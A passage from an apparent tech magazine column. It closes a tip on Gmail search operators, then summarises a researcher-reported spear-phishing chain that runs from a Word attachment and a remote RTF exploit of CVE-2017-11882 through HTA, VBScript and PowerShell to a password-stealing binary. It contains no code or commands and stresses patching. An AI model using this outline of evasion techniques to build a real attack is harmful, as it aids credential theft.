Continued from previous page
Then there’s the AROUND operator that looks for words that are close to each other in the message; used with a modifier you could try
AROUND 6 to find the words within six of each other, for example. There’s a whole smorgasbord of search modifiers you can use with Gmail, many of which you’ll find at pcpro.link/284search.
Have a convoluted Word about patching
Credential thieves are always looking for new ways to get your logins, such as using a malicious Word document attached to an email. Hold on, I hear you screaming, that’s hardly new. True, and if this were just another embedded Word Macro threat, I wouldn’t have given it a second glance. However, it isn’t, and it’s interesting to see how complex some people are prepared to be to evade detection.
The complexity of this threat, which was uncovered by researchers from Trustwave SpiderLabs ( pcpro. link/284threat), is so complex that it provides many an opportunity for the attack to go belly-up. Stage one involves the recipient of the spear phishing campaign email opening the infected Word attachment. This then accesses a remote RTF document via an OLE object within the file. That RTF file is then executed to exploit CVE-2017-11882 ( pcpro.link/284cve), which uses the Microsoft Equation Editor to run arbitrary code. By decoding ASCII, a Microsoft HTML Application (HTA) command line is executed to download a remote HTA file containing obfuscated VBScript – which, in turn and via a PowerShell script, downloads the passwordstealing binary.
So, plenty of steps that can fail along the way and nullify the attack of the victim. If he or she had kept up to date with patches then it would have been dead from the get-go, of course. But – and it’s a big one – by avoiding the usual run of scripting file types and sticking with DOCX, RTF and HTA, there’s less chance of it becoming trapped at the gateway level.